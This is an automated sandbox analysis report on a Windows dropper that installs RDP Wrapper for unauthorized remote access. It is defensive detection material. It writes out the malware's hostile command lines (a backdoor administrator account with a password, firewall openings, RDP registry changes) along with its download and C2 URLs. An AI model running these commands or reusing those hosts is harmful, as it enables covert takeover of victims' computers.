Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1524989
MD5:ea2954e7fc00520a5300e72edea11b0f
SHA1:cb9c5443999a5f62e83bb03756f8e1a8bcbefdb1
SHA256:ae939c4c31af5fc5e66e5f991239949a572f3af905118ae2f94fdf6dd080bc01
Tags:exeuser-Bitsight
Infos:

Detection

RDPWrap Tool
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
AI detected suspicious sample
Adds a new user with administrator rights
Allows multiple concurrent remote connection
Enables remote desktop connection
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: RDP Sensitive Settings Changed
Sigma detected: Suspicious Add User to Remote Desktop Users Group
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Yara detected Costura Assembly Loader
Yara detected RDPWrap Tool
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: New User Created Via Net.EXE
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • file.exe (PID: 6980 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EA2954E7FC00520A5300E72EDEA11B0F)
    • cmd.exe (PID: 1440 cmdline: "cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 4160 cmdline: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 2296 cmdline: "cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 6516 cmdline: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 5496 cmdline: "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RDPWInst.exe (PID: 7060 cmdline: C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i MD5: C213162C86BB943BCDF91B3DF381D2F6)
        • netsh.exe (PID: 5876 cmdline: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    • cmd.exe (PID: 7632 cmdline: "cmd.exe" /c net user BoydKrajcik hDNQhfjKM9S0 /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7672 cmdline: net user BoydKrajcik hDNQhfjKM9S0 /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 7688 cmdline: C:\Windows\system32\net1 user BoydKrajcik hDNQhfjKM9S0 /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 7712 cmdline: "cmd.exe" /c net localgroup MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7760 cmdline: net localgroup MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 7772 cmdline: C:\Windows\system32\net1 localgroup MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 7792 cmdline: "cmd.exe" /c net localgroup "Remote Desktop Users" BoydKrajcik /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7840 cmdline: net localgroup "Remote Desktop Users" BoydKrajcik /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 7856 cmdline: C:\Windows\system32\net1 localgroup "Remote Desktop Users" BoydKrajcik /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 7872 cmdline: "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • netsh.exe (PID: 7920 cmdline: netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
    • cmd.exe (PID: 7948 cmdline: "cmd.exe" /c net localgroup "Administrators" BoydKrajcik /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7988 cmdline: net localgroup "Administrators" BoydKrajcik /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 8004 cmdline: C:\Windows\system32\net1 localgroup "Administrators" BoydKrajcik /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
  • rdpdr.sys (PID: 4 cmdline: MD5: 64991B36F0BD38026F7589572C98E3D6)
  • tsusbhub.sys (PID: 4 cmdline: MD5: CC6D4A26254EB72C93AC848ECFCFB4AF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
      C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        SourceRuleDescriptionAuthorStrings
        0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          0000000A.00000000.2104981738.0000000000401000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            00000000.00000002.2499189931.0000000000C62000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
                00000000.00000002.2500984157.00000000032D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  Click to see the 4 entries
                  SourceRuleDescriptionAuthorStrings
                  0.0.file.exe.c60000.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    10.2.RDPWInst.exe.400000.0.unpackJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
                      10.2.RDPWInst.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                        10.0.RDPWInst.exe.400000.0.unpackJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
                          10.0.RDPWInst.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                            System Summary

                            barindex
                            Source: Network ConnectionAuthor: Markus Neis: Data: DestinationIp: 8.46.123.33, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\Users\user\Desktop\file.exe, Initiated: true, ProcessId: 6980, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49714
                            Source: Registry Key setAuthor: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali: Data: Details: %ProgramFiles%\RDP Wrapper\rdpwrap.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, ProcessId: 7060, TargetObject: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd.exe" /c net localgroup "Remote Desktop Users" BoydKrajcik /add, CommandLine: "cmd.exe" /c net localgroup "Remote Desktop Users" BoydKrajcik /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6980, ParentProcessName: file.exe, ProcessCommandLine: "cmd.exe" /c net localgroup "Remote Desktop Users" BoydKrajcik /add, ProcessId: 7792, ProcessName: cmd.exe
                            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\rdpvideominiport.sys, NewProcessName: C:\Windows\System32\drivers\rdpvideominiport.sys, OriginalFileName: C:\Windows\System32\drivers\rdpvideominiport.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: rdpvideominiport.sys
                            Source: Process startedAuthor: Endgame, JHasenbusch (adapted to Sigma for oscd.community): Data: Command: net user BoydKrajcik hDNQhfjKM9S0 /add, CommandLine: net user BoydKrajcik hDNQhfjKM9S0 /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user BoydKrajcik hDNQhfjKM9S0 /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7632, ParentProcessName: cmd.exe, ProcessCommandLine: net user BoydKrajcik hDNQhfjKM9S0 /add, ProcessId: 7672, ProcessName: net.exe
                            Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user BoydKrajcik hDNQhfjKM9S0 /add, CommandLine: net user BoydKrajcik hDNQhfjKM9S0 /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user BoydKrajcik hDNQhfjKM9S0 /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7632, ParentProcessName: cmd.exe, ProcessCommandLine: net user BoydKrajcik hDNQhfjKM9S0 /add, ProcessId: 7672, ProcessName: net.exe
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-03T15:07:46.813181+020028033053Unknown Traffic192.168.2.549713104.26.12.20580TCP

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: file.exeAvira: detected
                            Source: C:\Program Files\RDP Wrapper\rdpwrap.dllReversingLabs: Detection: 54%
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeReversingLabs: Detection: 68%
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoe Sandbox ML: detected
                            Source: file.exeJoe Sandbox ML: detected
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP WrapperJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.iniJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to behavior
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2
                            Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed source: file.exe
                            Source: Binary string: rdpclip.pdbH source: RDPWInst.exe, 0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: costura.costura.pdb.compressed source: file.exe
                            Source: Binary string: rdpclip.pdbJ source: RDPWInst.exe, 0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: RfxVmt.pdb source: file.exe, 00000000.00000002.2500984157.00000000035EC000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.10.dr
                            Source: Binary string: /_/Source/Bogus/obj/Release/net40/Bogus.pdb source: file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: rdpclip.pdb source: RDPWInst.exe, 0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: RfxVmt.pdbGCTL source: file.exe, 00000000.00000002.2500984157.00000000035EC000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.10.dr
                            Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: file.exe
                            Source: Binary string: C:\DEV\C#\RDPCreator\RDPCreator\obj\Release\RDPCreator.pdb source: file.exe
                            Source: Binary string: /_/Source/Bogus/obj/Release/net40/Bogus.pdbSHA256v0& source: file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmp
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_004092D8 FindFirstFileW,FindClose,10_2_004092D8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_0040F73C FindFirstFileW,FindClose,10_2_0040F73C
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_00408EB9 lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,10_2_00408EB9

                            Networking

                            barindex
                            Source: Yara matchFile source: 10.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: RDPWInst.exe PID: 7060, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED
                            Source: global trafficTCP traffic: 192.168.2.5:49714 -> 8.46.123.33:3389
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 03 Oct 2024 13:07:05 GMTContent-Type: application/octet-streamContent-Length: 1785344Last-Modified: Thu, 26 Sep 2024 12:36:03 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f55533-1b3e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 1b 00 00 04 00 00 17 f6 1b 00 03 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 f8 12 00 00 00 60 05 00 ed 7b 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 fc 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 04 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 c3 04 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 12 04 00 00 10 00 00 00 14 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 7c 1e 00 00 00 30 04 00 00 20 00 00 00 18 04 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 50 04 00 00 14 00 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 c0 4f 00 00 00 70 04 00 00 00 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 f8 12 00 00 00 c0 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 e0 04 00 00 00 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 04 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 5e 00 00 00 00 05 00 00 60 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 ed 7b 16 00 00 60 05 00 00 7c 16 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 70 17 00 00 00 00 00 00 cc 16 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: POST /core/receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 186Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                            Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                            Source: Joe Sandbox ViewASN Name: AS-PUBMATICUS AS-PUBMATICUS
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: api.ipify.org
                            Source: unknownDNS query: name: api.ipify.org
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49713 -> 104.26.12.205:80
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_0043CF60 InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,10_2_0043CF60
                            Source: global trafficHTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                            Source: global trafficDNS traffic detected: DNS query: hansgborn.eu
                            Source: unknownHTTP traffic detected: POST /core/receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 186Expect: 100-continueConnection: Keep-Alive
                            Source: file.exe, 00000000.00000002.2500984157.00000000035DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104
                            Source: file.exe, 00000000.00000002.2500984157.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                            Source: file.exeString found in binary or memory: http://api.ipify.org
                            Source: file.exe, 00000000.00000002.2500984157.000000000367A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2500984157.0000000003682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
                            Source: file.exe, 00000000.00000002.2500984157.000000000367A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2500984157.0000000003682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgd
                            Source: file.exe, 00000000.00000002.2500984157.0000000003688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hansgborn.eu
                            Source: file.exe, 00000000.00000002.2500984157.0000000003688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hansgborn.eud
                            Source: file.exe, 00000000.00000002.2507908437.0000000007A40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2500379278.0000000001602000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: file.exe, 00000000.00000002.2507908437.0000000007A40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2500379278.0000000001602000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: file.exe, 00000000.00000002.2500984157.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: RDPWInst.exe, RDPWInst.exe, 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drString found in binary or memory: http://stascorp.com/load/1-1-0-62
